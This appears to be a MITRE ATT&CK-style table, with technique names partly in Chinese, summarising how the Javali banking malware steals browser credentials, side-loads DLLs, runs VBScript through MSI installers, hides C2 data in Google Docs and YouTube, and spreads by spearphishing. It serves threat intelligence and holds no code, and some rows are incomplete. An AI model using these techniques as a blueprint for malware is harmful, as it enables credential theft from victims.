Javali
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1555 | .003 | 从密码存储中获取凭证: Credentials from Web Browsers |
Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.[1] |
| Enterprise | T1574 | .002 | 劫持执行流: DLL Side-Loading |
Javali can use DLL side-loading to load malicious DLLs into legitimate executables.[1] |
| Enterprise | T1059 | .005 | 命令与脚本解释器: Visual Basic |
Javali has used embedded VBScript to download malicious payloads from C2.[1] |
| Enterprise | T1027 | .001 | 混淆文件或信息: Binary Padding |
Javali can use large obfuscated libraries to hinder detection and analysis.[1] |
| Enterprise | T1204 | .001 | 用户执行: Malicious Link |
Javali has achieved execution through victims clicking links to malicious websites.[1] |
| .002 | 用户执行: Malicious File |
Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.[1] |
||
| Enterprise | T1218 | .007 | 系统二进制代理执行: Msiexec |
Javali has used the MSI installer to download and execute malicious payloads.[1] |
| Enterprise | T1102 | .001 | 网络服务: Dead Drop Resolver |
Javali can read C2 information from Google Documents and YouTube.[1] |
| Enterprise | T1105 | 输入工具传输 | ||
| Enterprise | T1057 | 进程发现 |
Javali can monitor processes for open browsers and custom banking applications.[1] |
|
| Enterprise | T1566 | .001 | 钓鱼: Spearphishing Attachment |
Javali has been delivered as malicious e-mail attachments.[1] |
| .002 | 钓鱼: Spearphishing Link |
Javali has been delivered via malicious links embedded in e-mails.[1] |
||